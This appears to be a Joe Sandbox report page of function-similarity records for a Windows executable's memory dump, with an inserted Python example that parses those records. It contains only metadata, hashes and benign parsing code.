                                                                                                                                                                                                                                                            • Instruction ID: 47103348cb8be07dd11cd2126138cc3e2b55c2da65ebae6b84f7fd8db31b7a85
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A511A33160C6A2D1EB68BB11A45113FB7A5FB85765F501235FAADC1BD8EF2CD014DB00
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C6E
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C78
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                                                                            • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                                                            • Instruction ID: 0bccee64ff07e10a3435a72a9376a38827acb2b2b52508163820708f931c66c0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9E04610F0C6A2A2FB0CBBF2A8841BA22A69F98704B004034CD1DC2391EE3C68858310
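The records above are the report's function-similarity entries: each "APIs" block lists the Win32 calls resolved inside one function of the dumped image together with the call-site address, the memory dump the function was lifted from, and the IDs and fuzzy hashes used to match it against other samples. As an added example that is not part of the Joe Sandbox report or its tooling, the Python below parses such records into structured data, copes with records whose "APIs" section is empty, checks the Opcode ID / Opcode Fuzzy Hash invariant visible on this page, and decodes the .sdmp file name. The .sdmp field layout (base address, page protection, memory type) is an assumption inferred from the values on this page, not a documented format; the sample text is constructed from two of the records above.

```python
# Added example, not part of the Joe Sandbox report: parse its function-similarity records
# ("APIs" / "Memory Dump Source" / "Similarity" blocks) into structured data.
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed sample in the report's layout: a record with two API calls, then one whose
# "APIs" section is empty (as some records on the page are).
SAMPLE = """APIs
• FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6404F4B49), ref: 00007FF6404F4C67
• SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6404F4B49), ref: 00007FF6404F4C7D
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
Similarity
• API ID: Time$System$FileLocalSpecific
• String ID:
• Opcode ID: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
• Opcode Fuzzy Hash: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
APIs
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
• Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
"""

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int  # call-site address given after "ref:"

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    source_file: str = ""
    image_base: int = 0  # "Offset:" of the source dump
    associated: List[str] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)  # API ID, Opcode ID, fuzzy hashes, ...

API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SRC_RE = re.compile(r"^(\S+\.sdmp),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(\w+)$")

def parse_records(text: str) -> List[FunctionRecord]:
    """Every "APIs" line opens a record; bullet lines are API calls or key/value pairs."""
    records: List[FunctionRecord] = []
    cur = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue  # section headers ("Memory Dump Source", ...) carry no data of their own
        if m := API_RE.match(line):
            cur.apis.append(ApiCall(m.group(1), m.group(2), m.group(3).split(","), int(m.group(4), 16)))
            continue
        if not (m := KV_RE.match(line)):
            continue
        key, val = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            s = SRC_RE.match(val)
            if s:
                cur.source_file, cur.image_base = s.group(1), int(s.group(2), 16)
        elif key == "Associated":
            cur.associated.append(val)
        else:
            cur.fields[key] = val
    return records

# Windows constants (documented values). ASSUMPTION about the .sdmp name: dot-separated field 3
# is the region base, field 4 the page protection, field 6 the memory type. That fits the values
# on the page (0x20 on the code region, 0x02/0x04 elsewhere, 0x1000000 = MEM_IMAGE) but the
# naming scheme is not documented in the report, so treat this decoding as a heuristic.
PAGE_PROTECTION = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                   0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

def decode_dump_name(name: str) -> Dict[str, object]:
    parts = name.split(".")
    if len(parts) < 9 or parts[-1] != "sdmp":
        raise ValueError(f"not an .sdmp name: {name}")
    prot, mtype = int(parts[4], 16), int(parts[6], 16)
    return {"base": int(parts[3], 16), "type": MEM_TYPE.get(mtype, f"0x{mtype:X}"),
            "protection": PAGE_PROTECTION.get(prot & 0xFF, f"0x{prot:X}"),
            "executable": bool(prot & 0xF0)}  # any PAGE_EXECUTE* bit set

def opcode_ids_consistent(records: List[FunctionRecord]) -> bool:
    """On the page each Opcode ID equals its Opcode Fuzzy Hash; False if any record differs."""
    return all("Opcode ID" in r.fields and r.fields["Opcode ID"] == r.fields.get("Opcode Fuzzy Hash")
               for r in records)

def index_by_api_id(records: List[FunctionRecord]) -> Dict[str, List[int]]:
    """Map similarity API ID -> record indices, the pivot for matching functions across samples."""
    out: Dict[str, List[int]] = {}
    for i, r in enumerate(records):
        out.setdefault(r.fields.get("API ID", ""), []).append(i)
    return out

if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        calls = ", ".join(f"{c.module}!{c.name}@{c.ref:X}" for c in rec.apis) or "(none)"
        print(i, rec.fields.get("API ID"), decode_dump_name(rec.source_file)["protection"], calls)
```

Run it against the whole "Disassembly" section of a report (stripped of indentation and the "Download File" link labels) and pivot on index_by_api_id to find functions with the same API ID across samples; the protection decoding tells you whether a record came from an executable image region, as every record on this page does (0x20 on 00007FF6404E1000), or from a writable region that would hint at unpacked or injected code.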

APIs
• CloseHandle.KERNELBASE(?,?,?,00007FF6404F9CE5,?,?,00000000,00007FF6404F9D9A), ref: 00007FF6404F9ED6
• GetLastError.KERNEL32(?,?,?,00007FF6404F9CE5,?,?,00000000,00007FF6404F9D9A), ref: 00007FF6404F9EE0
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
• Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
• Instruction ID: ce65d005f3c599956d7377c05d52b6584ab2b91f09bd573bfdf45ccabada9453
• Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C219621F1C662A1FE94B7A1A59037D2297DF84798F044239DA2EC77D1CF6CA841C300
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 164a9401b0bfd199dc8034d016670759b34e81a86d5a64e83628a5f98765227c
                                                                                                                                                                                                                                                            • Instruction ID: 9cf5907d01376cd0e5bb6381034db65cfcb815592214ca52d8606e2caa297b7a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 164a9401b0bfd199dc8034d016670759b34e81a86d5a64e83628a5f98765227c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0441DE3290C221E7EA24BB59E95127D73AAEB56B84F140131DA9EC37D0CF3CE802C790
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                                                                                                                            • Opcode ID: 76e73570fa56eea7b82f0ce9b23ab017b40ede92cf2ea0af6ac7e855768810df
                                                                                                                                                                                                                                                            • Instruction ID: 79de33e144b85122254a00d928d83cc061d4d76854a3312fe009ac64147d9609
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76e73570fa56eea7b82f0ce9b23ab017b40ede92cf2ea0af6ac7e855768810df
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10219125B0C672A6FA10FB16A9047BAA641BF95BE4F884430EE4D87786CE7DF042C740
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                                                            • Instruction ID: 05f3f1823e8e69add7a8ad172ae4d9fcce3b3ad2063d67eee3f14008919838cd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7431E461E1C6A2E2F701BB1488413BD365AAF90BA0F420135DA2DC33D2CF7CE4918721
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3947729631-0
                                                                                                                                                                                                                                                            • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                                                            • Instruction ID: 51d733b6250d5547d370224725a845e3b5ccf9c87fdbc428cb44c683dca630a9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D921AE32B19756DAEB24BF64C4402EC33A9FB44328F44063ADA2C8ABC5EF38D444CB50
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36F01251F2D267E5FE5876B15A51BB9128A9F84774F084630DD3EC53C1DEACA5418310
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                                                            • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                            • API String ID: 190572456-3427451314
                                                                                                                                                                                                                                                            • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                                                            • Instruction ID: abbbf6ab425959a4ee5db86c0e07891b53cc1cfff00ffca5121d5a0f11402665
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5DE1766890DB63F0FA5DFB14BA541B833A5EF1A798F845435C82E823A4EF3CA548C351
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                            • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                            • Opcode ID: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
                                                                                                                                                                                                                                                            • Instruction ID: b25be81cb71a796bf97b59b4ad97dce53ffa0d27d58ae6af5e4c5acef20fd6bd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4B2F4B2E1C2A29BE728AF64D6407FD37A5FB5538CF405135DA2997B85DF38A900CB40
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                                            • API String ID: 0-2665694366
                                                                                                                                                                                                                                                            • Opcode ID: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
                                                                                                                                                                                                                                                            • Instruction ID: 8577d0c187cc32b90f294497aebb14f984045c58d530ed39e0b28acbf9fc0b19
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F52B272A186B69BD794EF14C458A7E3BA9FB84340F154139EA4A877C0DF3DE944CB80
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                                                                            • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                                                                            • Instruction ID: 3ec315774e2e966e507582b769b1e8d3e34b39d51ed6993d7d51d750dfd109b8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC314C7661CB9296EB64EF60E8903EE7360FB85748F04443ADA4E87B99DF38D548C710
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Message$ErrorFormatLast
• String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
• API String ID: 3971115935-1149178304
• Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
• Instruction ID: 254e0af54bfeede140830f3e6c79a011187cf6447a103088df4033657765c7e9
• Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
